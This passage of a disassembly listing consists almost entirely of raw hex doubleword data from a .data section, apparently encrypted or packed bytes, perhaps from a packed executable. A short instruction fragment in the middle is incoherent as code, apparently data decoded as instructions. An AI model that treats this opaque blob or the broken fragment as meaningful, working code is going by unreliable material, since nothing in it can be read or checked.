dd 33D263F9h, 0B52EEA04h, 0A668D2E4h, 0F98E97A3h, 0FF96182Fh
dd 5D3CDCF2h, 5C22D1E9h, 18CF6481h, 5111EDC7h, 0B7A873E2h
dd 0DFF18295h, 0D288676Ah, 0A96C0623h, 2632C9B5h, 77381FC9h
dd 32C82D94h, 0EE2DD849h, 7AD743E1h, 23C014A3h, 918AE242h
dd 5BFD071Ah, 1B87ABCDh, 3A808B0Dh, 0E993675Ah, 2B315E6Eh
dd 0F3E94CD7h, 0F52C3D22h, 679678EBh, 0BC22F286h, 98FF3607h
dd 0AA9ED87Eh, 6F774DF9h, 0C89E4D1h, 9DE14ACEh, 4D9871C9h
dd 0CB61DC40h, 71443DADh, 7C153B9Dh, 0F5BFA9F4h, 91A2BF3Dh
dd 4018ED12h, 7C8520CCh, 4CD6F27Bh, 0DF4DD859h, 9D3275E2h
dd 0E343EFB1h, 0FAED8F34h, 24D93FEDh, 263D5CA2h, 0E3E64810h
dd 9482BE99h, 44295D5Eh, 0B88D4DFh, 0A22C4DFBh, 3DBBCF44h
dd 74B1E989h, 9B5F54CCh, 515D4A25h, 0BAF841CAh, 22E81D1Bh
dd 6435B47Eh, 8E7AE15Ah, 0D386B1F1h, 2F9040Dh, 0DB9FAF74h
dd 0B9867EC1h, 0B8136A6h, 0CE03BB1h, 8D31C2DBh, 6E2D13A8h
dd 0E88E32D0h, 0EF71E6EDh, 37670C55h, 316E15A8h, 3CAA9812h
dd 0B1919B95h, 0B7123430h, 0E351F76Bh, 0FE637F7Dh, 4772D65Dh
dd 0D1AC6A8Eh, 7ABAB06Ch
dd 868227C4h, 7237558Fh, 0CC04402Bh, 9EA010F0h, 0BA3AD691h
dd 2D8CD2CDh, 274F7CB0h, 0B4D46AD0h, 82E33494h, 5188E05Ch
dd 0CE2B759Bh, 8A6E0E3Ah, 0EBCC4702h, 0C6396595h, 0E7445CFCh
dd 61530567h, 41E3CFC3h, 92A23380h, 758820E6h, 477D42DCh
dd 0D47B2727h, 0D519C8B9h, 0A3FF2519h, 0C2758179h, 130BADB6h
dd 19B7B040h, 5ADAF981h, 40AEF7Fh, 234A9060h, 0B93055BEh
dd 31384167h, 6A5DA1BEh, 55CC6056h, 86C30048h, 0BC8D8D8Ah
dd 0C06C24F9h, 63494976h, 655203C9h, 1679B5E0h, 3D3BAC19h
dd 0FF6DADF6h, 0CDD9A04Eh, 0AB101494h, 0B8A08713h, 0EBD895C5h
dd 99AB5387h, 1A72407Eh, 0D55401D1h, 0F782BD5Ch, 6FE02C5Fh
dd 0B025050Fh, 0B43C272Ch, 204D1B8Ah, 0E8417482h, 0E2B8C0E5h
dd 1EB6B62Ah, 0E2914E08h, 5677D70Ch, 6DFBA618h, 90986C86h
dd 2F272884h, 0A25C296Fh, 1B937CADh, 417512C9h, 37F469E3h
dd 3B3DAA71h, 0D6EF1ACAh, 0CD44B1ABh, 0F5E1FE31h, 73C17C7h
dd 87018422h, 8A1468AEh, 0E5FC1B84h, 1E088BB8h, 0BB9B896h
dd 9361DCF6h, 0B418A9D7h, 0ADF1A2AFh, 0D48AF6A8h, 0B93C4D37h
dd 0BC66B735h, 7AAFB550h, 754D0C9Ah, 2A0C9B1Ch, 9A568341h
dd 5F8A6DC1h, 0D2166B2h, 3F514B5Fh, 0CE2C055Bh, 51285C7Eh
dd 0ECEE629Ah, 7F1D67EAh, 0A6EBF9C3h, 0EF7DD7E6h, 0A7F95938h
dd 0EDE5FC74h, 96933A46h, 0A45AD389h, 0C76F954Ch, 5F0A7B8Eh
dd 0C2230A6Ah, 0D50964ACh, 244C7FFCh, 330A98F5h, 0A783DB50h
dd 0EC449FC2h, 0C1948F47h, 5A6FD50Bh, 0C831D39Ch, 62EEBD45h
dd 0F701B96Dh, 41DE610Dh, 0B4EE738Ah, 5B36C240h, 25C91BCh
dd 95F6D922h, 9DA1EF08h, 1C3C0360h, 954A1D31h, 0F7C0813Ah
dd 0BF0820CCh, 6682B94Bh, 0E7D9E900h, 2D2B23C7h, 59CE5E9Eh
dd 0C9925E5Ah, 277A8068h, 0AA29BB92h, 35AE2F6Dh, 8266AC01h
dd 0D2718B34h, 0B8F58C9Dh, 0EB9C0704h, 0D1905066h, 44237042h
dd 8CB2B9F6h, 9FB52B21h, 59E8098h, 3919DC32h, 0A7406D07h
dd 14D913B9h, 0FDA8C1BEh, 555AB51h, 6BC05502h, 52A2A058h
dd 9F028586h, 2A7CB430h, 5BE36A73h, 0DB6C55FAh, 7D436A7Ch
dd 91F163FDh, 0E2C13E0Ch, 0DB100628h, 50F640A8h, 37CA8E12h
dd 36DD6E2Ah, 0DDBBDEA5h, 5B68939Fh, 81E0E16Dh, 0B6C9CF27h
dd 3B937118h, 5EF823D2h, 8ED59F2Eh, 22E5C817h, 73769606h
dd 0DFA291CCh, 0B702858Bh, 91C67D1Ah, 85D6132h, 2F79364Ah
dd 0E2749D41h, 9BB88C3Bh, 17B525C5h, 82DFA181h, 9E8C39F8h
dd 68C2527Ch, 0B1B8EE74h, 0DB3F12ACh, 99880AA7h, 0C9D5C8E4h
dd 425CB7A5h, 0F57C53DCh, 1A2ED4D1h, 0A6696E04h, 95E18B2Eh
dd 757F84CBh, 0D1B88534h, 6AE8E7C4h, 0C9BD3F06h, 51AD2D53h
dd 3B4501DEh, 0E001F7F2h, 0FF33B656h, 25351507h, 0B6CF2947h
dd 3426A286h, 0BE69EAD8h, 1A1457FEh, 0E0A31731h, 889CF192h
dd 9F4898B3h, 1E2F4D60h, 0E7B5EF79h, 4E519686h, 82D3904Eh
dd 4A2C0536h, 67E40280h, 68B45986h, 284376BFh, 6BA63774h
dd 0D93ECCDh, 0BC0406A3h, 0B3CD69D9h, 94302368h, 153449Dh
dd 34AD2753h, 3D967683h, 0C5C3EE94h, 90DDB845h, 44460F39h
dd 0F0BD8CF4h, 0A1CB182Eh, 2B843329h, 20F3217Ah, 4BCC9566h
dd 0C8AA37C7h, 9E63F9D8h, 6E8E66Dh, 0A21AC006h, 746F2D16h
dd 3525E389h, 0E839CABCh, 0EA51A4A6h, 21DE032Ah, 0E23D079Ah
dd 0D5D279D3h, 90FC30E9h, 66E2450Dh, 6C061098h, 67F7EA2Dh
dd 52E35F8Fh, 0A43ACD59h, 194D0D72h, 0DA9612Eh, 1A6771B7h
dd 99421BE9h, 91806EFCh, 7E7EC56Fh, 3E47E98Ah, 0BC47D6AAh
dd 952C6D18h, 0C250CBD8h, 598DDBD2h, 0F080F258h, 71B3DEB8h
dd 0E6984209h, 5C41DA00h, 169CA11Dh, 0F862E5Fh, 468B2C83h
dd 1E84395Ch, 0D9BC04A7h, 9F170F76h, 5E6EA56Ch, 0AA0731E8h
dd 11B7C207h, 32679221h, 69FD2452h, 807565EAh, 1FCEDFEAh
dd 0B19B5AE5h, 6E17A520h, 1FCA398Eh, 0BA8F7634h, 0C39D8140h
dd 1F4673AFh, 0BCD97BE6h, 21F48EF7h, 8F7E1FD9h, 679887F7h
dd 0E641E3B4h, 2F276E25h, 58B9130Ah, 0FB567582h, 0DB36B4E8h
dd 0B18113B1h, 2CF1F84h, 8267973Bh, 9137457Fh, 55E00BE2h
dd 39B06BB2h, 251F0679h, 20D75310h, 81872C44h, 66B7E91Ch
dd 41DEF097h, 0D87F9390h, 37DBEFAEh, 28A60661h, 0E7CFAB4Ch
dd 0F7A8662Ah, 0CC1073BCh, 0A57F267h, 0A26FBB06h, 6AB2671Dh
dd 4390A7AEh, 7D8D2889h, 4461F45Eh, 0D405F390h, 0A7649E9h
dd 379BA247h, 88A83472h, 0C17BDAD3h, 97306E0Dh, 604D41Eh
dd 0A76429D6h, 0DEF2CBDAh, 362D0B3Eh, 0A07B6B6h, 89F125AAh
dd 4188969Ah, 8C2764F4h, 1DC53DEEh, 90BF170Bh, 45C243Dh
dd 0DF727BC7h, 4DEDA25h, 7AE90B9h, 0B2CAB952h, 0FB7F410Fh
dd 0F0EC2AA3h, 5FC6FAC3h, 53E8D408h, 0AF85CA1Fh, 0B58FB29Ch
dd 0A846D0CEh, 354E34F8h, 0A81F6E6Dh, 1CC927C7h, 6AAB2947h
dd 8D54E77Fh, 392C1C59h, 729BC9B3h, 1E509015h, 14EC34F2h
dd 0FFCD7042h, 0E5133D5Dh, 8E15577Eh, 0CF580F2h, 1F224D34h
dd 2068B65Ah, 0EE38C07Ch, 5F58097Bh, 0A723288Dh, 388F5578h
dd 0BBE31478h, 0AD644F49h, 0D87A0208h, 168D2701h, 223B6C38h
dd 2AE72176h, 28B7317Dh, 0BC5383C2h, 0B51FA62Eh, 0D4945C35h
dd 7097DEB4h, 139602A6h, 0EE1F5C50h, 7AC67452h, 0AD664535h
dd 0A18AA023h, 8533F117h, 0BE4EBA23h, 9A36D5FBh, 7A104176h
dd 0F7707012h, 9B78EB72h, 0A1E391E6h, 0F7DD40DBh, 88768AFCh
dd 0E2D77CBCh, 0B370BCC1h, 1D51D5C9h, 91659E49h, 41051C8h
dd 6C565336h, 1597A362h, 4594B98h, 2DD2524Dh, 0F25EDEA4h
dd 466CF7ABh, 0EC00B509h, 280DC26Dh, 4314F4F6h, 0A2EE9F74h
dd 80DC9984h, 90D147BCh, 0A81EAFF6h, 567D5B65h, 6F99819Dh
dd 0FF221179h, 4A48CF5Ch, 0C61FE2ECh, 3F85C5C9h, 8495EEE4h
dd 0B6E7351Eh, 0A59C43A5h, 0CBA002FCh, 99670866h, 2DE23880h
dd 3B942B3Ch, 25376BA5h, 0FF45C257h, 8DAD180Ah, 23626AF5h
dd 0F9239B48h, 2C12F65Eh, 604C5D48h, 59333BADh, 218367D6h
dd 8857C490h, 66FFA5EEh, 0F86FA1Fh, 6086FE83h, 1F17A0FBh
dd 7BBC2DDEh, 48543893h, 0AF098723h, 3143AF0Ah, 45DAD7F1h
dd 0A0C822F8h, 0D14E0880h, 3F689AC0h, 161F036Dh, 1E70C74Eh
dd 260C3B9Dh, 6C8F8FFEh, 42937C5Ch, 0B6A242EBh, 0F1F0E82Fh
dd 4F9D8C10h, 0F9A1529Fh, 388D4239h, 750B0DBDh, 80722BAh
dd 0F5649F3Ah, 378A0354h, 2096F44Ch, 34BA1A3Ch, 8DE2A262h
dd 7AC55D4Ah, 0D26D5DE7h, 0ADF1A0D6h, 995DD2A0h, 5551DDC6h
dd 0F524FC87h, 0AE32D7D8h, 0D6CA96C1h, 0E0B48CF1h, 93B960B2h
dd 5C39920h, 525F1F96h, 0C98704EDh, 3E615BBh, 691A28C6h
dd 9205C28h, 4FB097D9h, 0A2C926ADh, 0CEBB83B1h, 946F49C7h
dd 9CE6C1F9h, 0A04DC592h, 5E4A9629h, 0F8B12744h, 7E0204A7h
dd 40757615h, 9FE2AEDFh, 26E9084Ah, 0CB9C3817h, 442D4595h
dd 47BFAC19h, 60E980ECh, 1D22D37Fh, 3098E543h, 679BF06Ah
dd 84B267BCh, 7E96453Bh, 0E750C906h, 0A2A0F466h, 0A7F3F3B6h
dd 0D6B4D541h, 4D6B7A70h, 78FA1A81h, 5CBD3642h, 7BFAA125h
dd 3F2F13Eh, 0F0E2FD4Dh, 0AC54E6CAh, 0DF7B1080h, 0BB42794h
dd 0C7FB6904h, 9F78913Ch, 0B51521E2h, 0CCCDF557h, 9488E423h
dd 244ECA98h, 495981E1h, 0FC5161DFh, 8808AF1Dh, 0D7E6C53Ah
dd 8FC9F5BCh, 1C77A1F0h
dd 0B4362196h, 42878592h, 0B8BE62B9h, 140F2FC1h, 7942C60Eh
dd 9949212h, 6F34CF1Ch, 0B291AADCh, 0DA3F3557h, 0E7840579h
dd 7D2BCAF7h, 0BDCFD85Ah, 7B1C116h, 0AB764B8Bh, 6297B121h
dd 0F21CBB67h, 0F64AE555h, 5F684041h, 0BEB0ADEBh, 3E7F8781h
dd 66BB8B11h, 4D7C4E2Fh, 0D54FBEBBh, 6B6E05E6h, 801E2FCDh
dd 0F6570F23h, 92D23C51h, 0D16A5B85h, 1A66B820h, 631403D0h
dd 31456796h, 8ECB127Ah, 2A1DB642h, 1100E865h, 363E3B2Eh
dd 8A6EBE27h, 21DA007Bh, 64E650B5h, 227D713Dh, 0B8E475D0h
dd 35F7BC71h, 0CA945857h, 6BC9C8D9h, 1AA6182Ch, 0C99656E1h
dd 0B512FBE8h
; ---------------------------------------------------------------------------
mov bl, 8Dh
loc_4238BE: ; CODE XREF: .data:00418D29�j
mov edx, 5FC5B631h
enter 6780h, 68h
push 2Ah
retn 6465h
; ---------------------------------------------------------------------------
dd 291399D5h, 58BF78C7h, 8FC47C24h, 0EE487D00h, 0FD3AB725h
dd 10943F5h, 8622AA47h, 8242D579h, 0C7AE0C75h, 1ADE861Fh
dd 6390A197h, 89EAFC72h, 3FCC0F91h, 6DB62959h, 0CEA72AFBh
dd 0EF107886h, 7E437E2Dh, 0FA87F682h, 688C13DBh, 0F2B3DA24h
dd 65B120D4h, 33BB92EEh, 0BDA533A8h, 142F626Eh, 50A54C6Dh
dd 0AFB95250h, 0CD0E75FDh, 0F12E1172h, 71191523h, 41F4769Bh
dd 0F3F1D5FAh, 0EB85FB68h, 8468C73Bh, 72A74297h, 968BB630h
dd 0CDA7A57Ah, 0EF3FACF9h, 929D1203h, 0FC2BD86Ah, 0B9A05FA6h
dd 5C9B3400h, 3FF47C64h, 0DA66E23Eh, 3D8B12CEh, 65F509BCh
dd 237960C6h, 5368BE19h, 0E141A682h, 1D873235h, 1C510EC1h
dd 70FFAFE4h, 5426917Ah, 0C3DD689Ch, 114889ADh, 0CDFDFBB2h
dd 0BBEE63EBh, 4FD276A7h, 83EC9184h, 8FA16E3Dh, 81DAA653h
dd 8B72C2B3h, 5AB4480Bh, 70BBC2Ah, 78EDDE42h, 0B3152FEDh
dd 712B5AD3h, 0DDB222B5h, 274D66A5h, 468F81F2h, 4E56D99Fh
dd 0EF272C46h, 0C07CF3C5h, 322737DCh, 0D87C4647h, 39204E47h
dd 4A37B695h, 0D5B8472Dh, 0C0BEDDDh, 350525A5h, 853ADE78h
dd 831F3B36h, 3722F3F1h, 0B9A461F2h, 90FDB2A8h, 0CFA694E7h
dd 7367B892h, 4FE47438h, 7A4F0407h, 6FC7DF22h, 0DF5B49D6h
dd 0B8BE17A5h, 0F6721F3Ch, 1FA70BF3h, 0F41CE61Ch, 6D31C520h
dd 5476BF14h, 0F3302A48h, 42F086EDh, 3188060h, 4A74ECE3h
dd 76C3F952h, 28BCE76Fh, 1312FDBFh, 80ACE014h, 0A1D23CF4h
dd 0B443DECAh, 46002972h, 986F88AAh, 0D4C000EDh, 0B66A1282h
dd 851BD33Dh, 0D1AB14D4h, 46174A24h, 0CD2D92B0h, 0C19DFF07h
dd 4955757Dh, 7D796581h, 0AC144110h, 99036AF8h, 20F8ACD8h
dd 6E3A39B5h, 60A294A5h, 0BB6C2800h, 241C6EC4h, 98D05E4Eh
dd 0C07E55BCh, 41186CAh, 0B5234BE0h, 501141A8h, 0D95658F3h
dd 4E4AEDD8h, 0BC956145h, 3E5E57ECh, 0D0D8FC18h, 3B001D33h
dd 3C02771Eh, 0EF17DFF4h, 0D55CEBCBh, 32EFAC6Fh, 0EAFD8FC3h
dd 0B2CF70F9h, 0EB67A1E6h, 9695C8C2h, 2BEBDD8Ah, 0A2247E34h
dd 412D80B5h, 0FE2A63E2h, 34947CC7h, 359D8BE4h, 2A96AA3h
dd 0B36B85C0h, 3B0ADCFBh, 7DDA1FBEh, 0AB8152D2h, 0FADE1C43h
dd 8CED7B4Eh, 4908CD4Fh, 0EEA4D65Fh, 0B4C21BF4h, 0E337C4ACh
dd 0C91B157Eh, 4A1AD7A9h, 0F4321D17h, 0F71F786h, 1442339h
dd 583233BAh, 3B840272h, 7EA9914h, 18F8E05Dh, 785A8654h
dd 343DFBCBh, 0FDE228FBh, 0BE1DD0F8h, 5EC86837h, 5F0D3E2Fh
dd 0C5A61A2h, 0A79FC4C4h, 0E7BD3C8Bh, 9DE501C5h, 0FCCDBAAh
dd 998670A6h, 3AD74DBEh, 12966E52h, 911AF704h, 0A7635A46h
dd 0FD3822BDh, 0CB7B5F60h, 1484BC20h, 2C0F7F5Ah, 1836E4A5h
dd 0F507E129h, 30608683h, 89026313h, 712E20Ch, 240B05CFh
dd 4C16888Dh, 0BF39406Fh, 2C0C40DEh, 6A0CBBF6h, 0D5F62379h
dd 158200E6h, 2BC68F35h, 9C3351DAh, 5E789CCFh, 0DAEEF229h
dd 51A92F03h, 25FB4B08h, 0DF5FC97Dh, 7AD3CAA7h, 30339400h
dd 0AED65D4Fh, 71800BDFh, 573EDD6h, 0CD20163Dh, 827DF7B2h
dd 199F073Bh, 9B0827D6h, 1F53008Ch, 0BCFC81B0h, 2D021A7Dh
dd 60514AAFh, 0EBD603D9h, 0A81BD5A7h, 31AF98Ah, 5BD2AB0h
dd 2E3C28C3h, 1DE89018h, 89520E7Bh, 983299A2h, 33B7234h
dd 1BA56698h, 86133DF7h, 1735F449h, 4523AC50h, 3821002h
dd 84A0649h, 68125EC1h, 0FAF409BAh, 964766AEh, 0EB0B7866h
dd 0F13FEE63h, 2D386449h, 0C754A996h, 0E204BE7Bh, 9B37EDB8h
dd 0F00B64A4h, 2C1648E1h, 51066CA1h, 54F084EFh, 7048B206h
dd 0B7D8D1Ch, 4FD06C0Eh, 0FD6E06DEh, 3B9E6183h, 29859CC6h
dd 0BB672348h, 0A2E6A11Dh, 3151929Dh, 0EF265F96h, 6367734Ah
dd 53A8909Dh, 403E8189h, 1BDA9B6h, 0A92849DCh, 846844C9h
dd 21146496h, 7511D9C6h, 4E35F1EBh, 0DE2846CFh, 59E59BC6h
dd 0B45F1CE7h, 28FA6B72h, 47C130EDh, 1C32E1BDh, 0B5D9F3C2h
dd 882B4E89h, 0BC81A20Eh, 0BC45285Ch, 0C19EFF6h, 0B6512879h
dd 6D837E1h, 0FE7AE2A1h, 0B3A62605h, 0C19CD7A2h, 0AA8C9377h
dd 34AD583h, 7AD97589h, 474601FDh, 0B5A0AD5Fh, 0B55C35Bh
dd 0B13D16DEh, 0E0F2B569h, 18A135A5h, 0DD544D69h, 0CE163ECAh
dd 497B6159h, 0B58D3322h, 0EC2140D1h, 907E0635h, 0FD5E53D5h
dd 74EB2841h, 97DBE73Fh, 0FBC3940Ah, 2150115Bh, 7FD3002Bh
dd 2226EC8Bh, 36011C24h, 7DDC15E3h, 0CC7A20C0h, 57E7C5F6h
dd 0CEF60911h, 3C3DF102h, 5411BB38h, 2295287Ch, 848C9AC4h
dd 0E748AD9Dh, 4464382Fh, 6A4B7501h, 0FA87AF05h, 84B0363h
dd 0D997F55Eh, 0F4EF9487h, 214EEDDBh, 0F48203Eh, 5D216957h
dd 0EBF70A79h, 0BDCAF846h, 250197B9h, 0BB5E8280h, 66FBACA5h
dd 5CE3C2Ah, 527BCDDh, 0BED0B291h, 73ECB059h, 1915991Ah
dd 895CFDB4h, 28FCEFE1h, 552173FDh, 80D63256h, 94856DABh
dd 0D84B10Fh, 0DD14FC9Bh, 86D8A8ABh, 0C5D804B7h, 18BE4DC0h
dd 0DAF94264h, 0E886742Ch, 0F9A30D61h, 0C53BBD56h, 0EB47219h
dd 2ECD2315h, 1309720Ch, 8E60A360h, 0FB8BA07Eh, 48565D31h
dd 0D645F26Eh, 75BD4A48h, 51E4AE2Eh, 8E49D033h, 0DCEF15BAh
dd 0EAA33D59h, 55109865h, 222630B4h, 569B4C13h, 0D0E8DBE7h
dd 0F4D0C482h, 0D7CDB3A7h, 864B2AE1h, 6C44FD44h, 3CE93757h
dd 0C2CFDCEDh, 0CD446272h, 754C0E20h, 67B13B01h, 0D4D1ED27h
dd 77FB59A7h, 0C090B551h, 0FA94238Fh, 14C1FF6Eh, 0D0181AB8h
dd 6912A44Ah, 0D5C5A672h, 95A0EED0h, 0D7560E0Eh, 3C0CFE71h
dd 2333F269h, 67DE7FA6h, 0AE220454h, 0CFAE8C1Fh, 82984811h
dd 743C2B1Dh, 768F31C1h, 0FCA2742Bh, 373151DFh, 14135A77h
dd 83046E7Fh, 0EF8C7E22h, 0EF4D1FA0h, 0D4DE6F5Bh, 78079099h
dd 9F688FAAh, 0FDE3E92Ch, 0A76208B7h, 1C1FC06Ch, 0CE247D3Eh
dd 8264CF07h, 0EE12D666h, 0F9ECD321h, 911BA71h, 0AB18836Bh
dd 4C697EBBh, 960979B6h, 0D9FB8D16h, 4FAB352Ch, 17FB1E1Bh
dd 661B3C4Bh, 1C50F755h, 1FA7E1A8h, 62D2D196h, 6DCD7BFh
dd 0E29B99D3h, 0A4E03793h, 5DC7661Eh, 0AC71FCCBh, 0CDDC8FC1h
dd 3FE74198h, 0D0BB1156h, 229545F2h, 16FC12BBh, 0B1A7989h
dd 46137F50h, 0C9CADA47h, 0C43D79ECh, 551A19E3h, 0A457D76Bh
dd 0BF0398DAh, 445CA2C6h, 0B5921AEh, 0BB9F6823h, 0B8C2F59Fh
dd 10A5908Dh, 5CA9CD39h, 0D1496D58h, 0E48D1276h, 0DF268E60h
dd 0B7CAD1AAh, 0D927D795h, 0AA592FE4h, 7349D5DEh, 0AA254409h
dd 410479C8h, 0A23DF72Eh, 741DD538h, 1BE1DC76h, 734E1F9h
dd 2845FF52h, 14BECC2Dh, 0EF06B8BBh, 5BCF6E19h, 0B54D014Dh
dd 0FA518084h, 36C67A6Fh, 6921158Ah, 361EB701h, 73CDEBD8h
dd 14E779E3h, 20DB743Ah, 4F43C504h, 980B57FDh, 676D0F3Eh
dd 0E19849E7h, 212DDD20h, 466C9B35h, 5757240Ch, 6A3096ACh
dd 5A94A397h, 0E4D6626Ah, 0DE86B545h, 0DC5CB9AEh, 0F1757B40h
dd 0B92DFA04h, 1FAAE6D0h, 290819ABh, 0C4ADA98h, 8E3D3248h
dd 5A4897DBh, 0CC062B4Eh, 3E2E21A6h, 0DCD2F67Eh, 24C09A9Ch
dd 0CAC44488h, 0AD8B043h, 78A1D2D8h, 0C3FA9433h, 45869D34h
dd 2AA93FC9h, 0A21FFF1Fh, 0FA62660h, 329D0DAEh, 8348E637h
dd 736CD78h, 325B95A2h, 6C2601E2h, 49E5FAD8h, 0E06BBE2Eh
dd 874C2F85h, 0FBF6CBCFh, 9158B641h, 0A78B9956h, 0E6CC794h
dd 9D6988Ah, 0DCFF4EAAh
dd 0ECDDE5A1h, 7418D97Dh, 5E5DC882h, 0B83E9CE4h, 4E347D7Ch
dd 83C98622h, 16CDB430h, 2F79908h, 500403E2h, 6F9B46C0h
dd 0A1C262Ch, 57E72AD2h, 0D9D166h, 0E4542C23h, 0D1DEBAC2h
dd 0D551026Fh, 0FA4FFC0Ah, 748964F0h, 0AEBAD5BFh, 2BD7712Bh
dd 0CA720F3Fh, 1995E59Ah, 7C1F0565h, 0E4344F05h, 4A5F54C5h
dd 0F0D9AD00h, 3038E336h, 9D4B01DAh, 93632080h, 0BB28D920h
dd 2DEEE787h, 0D9AA402h, 0C7AACA83h, 0A3F5F118h, 14D0ACC9h
dd 0FF39EFh, 172EB6EAh, 98C72CEh, 723407A9h, 85C6AB0Fh
dd 4AC9BCEFh, 9AFB2871h, 0DCFC5DBFh, 5046797Fh, 1480E4E4h
dd 0C1E724AAh, 0F51D1676h, 0A04D3423h, 1530FD02h, 1A96C335h
dd 428B835Ah, 6737A07Ah, 161F0DB7h, 685153A1h, 2F85B9C6h
dd 0BF3A03E5h, 5C025511h, 77DB5C98h, 6F20144Fh, 75368698h
dd 2EDF3165h, 997561BAh, 90431E2Bh, 16354E5Fh, 2D8B660Fh
dd 0E80D8D44h, 50E06F74h, 69014BCBh, 1CB6D581h, 0B9865E3Ah
dd 0D5E4CB55h, 0FC8D60E2h, 0E78319BEh, 6FCABF76h, 182B2A38h
dd 7B8846A9h, 260E468Ah, 8074B50Ch, 95D077B1h, 0E95538EDh
dd 78D3B26Eh, 0D3C224E3h, 57EDC064h, 0EF88A8D1h, 4DE79158h
dd 272F99BEh, 6934B7ACh, 0B6BC3253h, 1C6B09F1h, 1C433AFBh
dd 0AA8C45CCh, 7EFBE41Ah, 0CF69CC2Dh, 0A3BCD771h, 29826491h
dd 0F74A298Ah, 0E2142B80h, 0B95C7035h, 0F4F2E1ABh, 7A5DBF48h
dd 0E7EE37F5h, 8F8BAF9Ah, 68EF64CAh, 8D904F20h, 2BC27CF7h
dd 28B1780Eh, 0C27B1FBDh, 0F0909311h, 0A012EE88h, 8A17FD95h
dd 0B0098588h, 8E123469h, 9CEDE605h, 4CB1815Ch, 68566F72h
dd 0A05A7364h, 55571507h, 0F8C83CF9h, 150E0C56h, 7312EBA3h
dd 0CFFB724Dh, 982105FAh, 0CA9528BDh, 0CFDCA5BAh, 259F3B61h
dd 0B6194AE4h, 0B0555343h, 2F21974Eh, 8B9E4938h, 0E2764E2h
dd 7960939Bh, 6029EA69h, 61D9542Dh, 1BEF5D81h, 470C1935h
dd 263F206Ch, 5DBC04D0h, 0C361344Ah, 72CACFFFh, 0D7F1203h
dd 1FC528A2h, 21F4E9F1h, 95CB643Fh, 98DF5B34h, 49A62640h
dd 2D41DB13h, 63CAB759h, 0A60C9B58h, 6AE36C04h, 39CB0A3Ch
dd 0F5E52BEFh, 553179Ch, 0BF4AF908h, 0FF3B8931h, 26E69E7Fh
dd 81E90B51h, 656E76DFh, 872D5687h, 5EB684C0h, 4856249h
dd 0BBFE4063h, 36F9B29h, 36AFC748h, 8D19ECDh, 7EE7709Eh
dd 0C275E52Dh, 0C8CFC410h, 344E8CF9h, 0BA42D801h, 73760D67h
dd 93709D45h, 7030DAEBh, 29820838h, 0CE745826h, 26414BEFh
dd 34B6EB9Ch, 0F1BA8ADDh, 1754F4F2h, 3A528C89h, 6049E9CCh
dd 0EF453764h, 7E5084D1h, 242B8DABh, 286387E7h, 0C16D4F66h
dd 0A94AB2EFh, 357F54h, 0FA49DA10h, 8EA254E8h, 0E8A75362h
dd 8E9832DBh, 1838D369h, 5437E46Eh, 67CF1BC6h, 5C7F4DAEh
dd 792E42C0h, 0DEBEF233h, 1C086F4h, 0A4690BDEh, 0C3A3F3C0h
dd 68FED257h, 0C9700FF1h, 5DF95D16h, 0F1EB014Ch, 0A6B1A962h
dd 1854A208h, 4FB8EF79h, 0E9ACA726h, 0D6B3DDE3h, 0FE372D91h
dd 45FE7F23h, 16177361h, 0B972A0Ah, 0A4B81244h, 330429F5h
dd 33A5CFB0h, 0DFCE6C3Dh, 8585F105h, 45CE1299h, 40C13902h
dd 5739E2AAh, 116D9AE3h, 6EBA6B4Eh, 4ABDC563h, 61108849h
dd 69F3EB67h, 0D5F092EBh, 271F6D57h, 97CCCC64h, 78452625h
dd 0DF1DBA60h, 0AB66D7E4h, 0A239A1C4h, 0F622CD5Fh, 2237E1E2h
dd 0B276A31Bh, 4F713224h, 0BDE0B359h, 929BBCA1h, 7FBDD726h
dd 1B63B5E9h, 1CE5CD36h, 0D95C933Eh, 7C422D9Ah, 5CE88C6Bh
dd 905D277Fh, 615216A4h, 1CFB78D0h, 2568C2E2h, 963A2862h
dd 970D6C81h, 753856EBh, 68DA8064h, 0F042E457h, 94AA412h
dd 0D3783DFAh, 0BEF58F88h, 36970F38h, 1DDC68E5h, 145AFF44h
dd 0BAFAA417h, 1DC7F637h, 8E907B10h, 9DACF5F8h, 0FF2A2819h
dd 402D4642h, 71F4A0C6h, 0ADEA99DCh, 1C4AEC4Eh, 15180C8Ah
dd 0F19639Fh, 6624C0E7h, 0E70F8912h, 0A97E836Eh, 5E844AD2h
dd 1CC5BFBAh, 8C08760Dh, 466B9DE7h, 2C8BCA6Eh, 53678CC3h
dd 2E56AE77h, 691536ACh, 0AD17D453h, 7B904482h, 7291D485h
dd 0FACFEF97h, 53CF2A0Ah, 5F1C15EDh, 76D97098h, 8F763E3Ah
dd 9AE9208Fh, 61CF3A44h, 62416CB1h, 0A3A31353h, 0D3A0CFDAh
dd 0BAEA720h, 903CA49Fh, 0AA95444Bh, 1E20046Fh, 8FBC783Ah
dd 722C0B24h, 0BB9C1E1Eh, 0D7802615h, 4F744F68h, 5B35C01Ah
dd 2D25DCC4h, 6AA5E2A5h, 4C7C0497h, 0EB708F79h, 741A2DF5h
dd 52006D40h, 0D8C04C5Fh, 5CDC3D09h, 96436B35h, 0E4273D98h
dd 64E063F3h, 9DFF13BBh, 1FD357E2h, 9D8A4D2Dh, 2E0A0AFh
dd 3C3A8472h, 0FF101253h, 1820A37Bh, 80876F9Ah, 0D8FD6F9Ah
dd 0A27B6A62h, 9274509Fh, 19153F51h, 0F1FAA948h, 698AC27h
dd 93E8A85Dh, 0D7EA8528h, 0F3B51FAFh, 916A5521h, 0E59145E7h
dd 8E4633Dh, 0D5D434EEh, 42DCEFFDh, 31C58928h, 1EC04830h
dd 0A6354C1Ah, 1800A70Fh, 0FB450E4Dh, 13AF37BBh, 149E9EC4h
dd 1E610ECFh, 0DD1F8B3h, 689F4C7Fh, 0D6B8457Fh, 0E56F1396h
dd 0CDDD925Fh, 6F1D19EFh, 0A091F513h, 0C7D5CB58h, 0B8C012Dh
dd 26E35279h, 995B3A8Eh, 0E743FD14h, 808B4B61h, 87B4069Eh
dd 69978FD5h, 0D7E47EEDh, 0B4B15CF4h, 7CCFECC6h, 0AB84DD21h
dd 5414B270h, 0CD3FDF07h, 0F79B0678h, 5E254B28h, 86EF41B8h
dd 1701141Bh, 7C5519B6h, 0B36CE541h, 92F662E1h, 7580D7B4h
dd 20960CA2h, 78F0BAB1h, 5259A99Bh, 34596568h, 2CBDEAEDh
dd 0E1A35834h, 0FDB7E5ADh, 3DE451E5h, 96E910E8h, 9C35BCCCh
dd 0D28F40C2h, 35C8BFCDh, 61C1E07Ch, 6BE4881Ah, 2798C265h
dd 0DD508757h, 6A957A27h, 0A53754E2h, 19A69E5Fh, 0A0D330DDh
